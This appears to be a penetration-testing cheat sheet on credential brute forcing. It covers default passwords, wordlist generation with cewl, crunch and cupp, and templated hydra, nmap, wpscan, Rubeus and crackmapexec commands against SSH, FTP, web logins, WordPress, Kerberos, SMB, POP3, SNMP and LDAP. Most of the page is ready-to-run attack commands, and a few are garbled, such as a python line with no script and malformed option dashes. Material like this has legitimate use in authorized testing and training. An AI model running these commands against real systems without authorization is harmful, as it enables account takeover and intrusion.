Brute Forcing


One way to gain access to a company's website, service, infrastructure, computers... can be achieved using default credentials or weak credentials. For example, the administrator password for the company's firewall could be "spring2022".

Default credentials

Many web applications, services, and devices have a default administrator account with a default password. However, the password might not have been changed after the device was set up. This is an opportunity for the attacker to obtain the default credentials for the technology to gain access.

Try to identify the software, find whether it uses default passwords and if so, what they are:


In case the default credentials for the target did not work, an attacker could use already existing dictionaries with default passwords or craft a dictionary based on the password policies of the targeted company.

Existing dictionaries

There are already built dictionaries with thousands of passwords.

Crafting dictionaries

Based on the information of the target we can craft personalized dictionaries. Moreover, there are tools that can facilitate the attacker the work.

  • Cewl: Crawls the website you provided for commonly-used keywords and collects them into a list for you.

cewl <URL> --with-numbers -n -m 5 -d 3 -w output.txt
  • Crunch: you can specify a character set, and it will generate a huge number of permutations using the characters you specify.

# Generate a combination with a set of alphanumeric characters
crunch 5 8 abcdefghijlkmnñopqrstuvwxyzABCDEFGHIJLKMNÑOPQRSTUVWXYZ0123456789
  • Cupp: Generates passwords based on provided keywords about the target.

cupp -i


This subsection contains commands to perform brute force attacks on different technologies.


hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT>] | -p <PASSWORD>} ftp://<TARGET>


hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f ssh://<TARGET>
nmap -n -p 22 --script ssh-brute <TARGET>
nmap -n -p 22 --script ssh-publickey-acceptance --script-args "ssh.usernames={'<USER1>', '<USER2>'}, ssh.privatekeys={'<PRIVATE_KEY_1>', '<PRIVATE_KEY_2>'}"  <TARGET>


An attacker could encounter different login portals during a web analysis that can be brute-forced.

Basic Authentication

hydra -I {-l <username> | -L <USERS.TXT>} {-p <PASSWORD> | -P <WORDLIST.txt>} -f <IP> -s <PORT> http-get <URL>

Post Authentication

hydra {-l <username> | -L <USERS.TXT>}  {-p <PASSWORD> | -P <WORDLIST.txt>} <TARGET> -V http-form-post '<ENDPOINT>:<usernam=^USER^&pwd=^PASS^>:<WRONG CREDENTIALS M'

Note: Nowadays, hydra does not support forms with CRFS tokens. Thus, a solution would be to use Burp Suite.


wpscan --url <WORDPRESS_URL> –-passwords <WORDLIST.TXT> -–usernames <USERS.TXT> -–max-threads <NUMBER_THREADS>


There are several ways to perform a brute-force attack against a Kerberos service.

# with a list of users
python -domain <DOMAIN> -users <USERS.TXT> -passwords <WORDLIST.TXT> -outputfile <OUTPUT.TXT>
.\Rubeus.exe brute /users: <USERS.TXT> /passwords:<WORDLIST.TXT> /domain:<DOMAIN> /outfile:<OUTPUT.TXT>
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<WORDLIST.TXT> /outfile:<OUTPUT.TXT>


nmap -n -p110 --script pop3-brute <TARGET>
hydra  {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f <TARGET> pop3 -V


First of all, check the passwords policy to avoid banning accounts.

crackmapexec smb <IP> --pas-pol

Then, you can brute-forcing with the following tools.

crackmapexec smb <TARGET> -u {<USERS.TXT>|<USER>} -p {<WORDLIST.TXT>|<PASSWORD>} [--continue-on-success]
hydra {-L <USER.TXT> | -l <USERNAME>} {-P <WORDLIST.TXT> | -p <PASSWORD>} smb://<TARGET>


You can brute force SNMP community strings with hydra.

hydra -P /usr/share/wordlists/SecLists/Discovery/SNMP/common-snmp-community-strings.txt <TARGET> snmp


Attempts to brute-force LDAP authentication. By default, it uses the built-in username and password lists. In order to use your own lists use the userdb and passdb script arguments.

nmap --script ldap-brute -p 389 <IP>

Another option is to use hydra.

hydra {-L <USERS.TXT> | -l <USER>} {-P <WORDLIST.TXT> | -p <PASSWORD>} -f ldap2://<TARGET>


Last updated